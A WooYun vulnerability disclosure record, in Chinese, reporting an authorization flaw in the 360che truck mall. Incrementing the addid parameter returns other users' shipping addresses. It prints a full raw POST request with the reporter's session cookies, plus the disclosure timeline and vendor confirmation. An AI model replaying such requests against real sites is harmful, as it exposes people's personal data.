乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-22: 细节已通知厂商并且等待厂商处理中 2015-12-22: 厂商已经确认,细节仅向厂商公开 2016-01-01: 细节向核心白帽子及相关领域专家公开 2016-01-11: 细节向普通白帽子公开 2016-01-21: 细节向实习白帽子公开 2016-02-04: 细节向公众公开
RT
卡车之家商城,存在收货地址越权获取,泄露用户信息。获取用户收货地址请求为:
POST http://mai.360che.com/flow.php?step=xiu_add HTTP/1.1Host: mai.360che.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://mai.360che.com/user.php?act=address_listContent-Length: 23Cookie: Hm_lvt_87035a00e917f0eee43e4967b495f7c9=1450759595; Hm_lpvt_87035a00e917f0eee43e4967b495f7c9=1450765028; _ga=GA1.2.2000828923.1450759595; udstatistics=6391404636121756; epnonestats=1954774083977996; ECS_ID=74e547b4f3ed154a4cf8681b014c8be2d46fba8c; ECS[visit_times]=2; in_serverID=162nginx; IESESSION=alive; pgv_pvi=4695963648; pgv_si=s140340224; ECS[history]=50%2C66; AbcfN_oldtopics=D910893D979595D; AbcfN_visitedfid=6; AbcfN_cookietime=2592000; AbcfN_auth=1f89Nbc1xRi1gGdSw446Yw5LDRn67zLuQ8vb4zKaO%2F9uOaX3FN9VwiOQpyMrjwzX1vDTbGwHS6S83Gxu2NMyosMOlgH0; AbcfN_userid=%B9%F0%C6%BD%BF%AA%D4%AA; AbcfN_ajaxuid=235969; AbcfN_uservest=1eb8101c4c65ea79965c5448208e0fbe; _gat=1; ECS[username]=%B9%F0%C6%BD%BF%AA%D4%AA; ECS[display]=gridConnection: keep-aliveaddid={"addid":"18451"}
修改addid可获取其他用户的收货地址例如addid=18451
addid=18452
如上
权限控制
危害等级:中
漏洞Rank:10
确认时间:2015-12-22 17:27
多谢反馈
暂无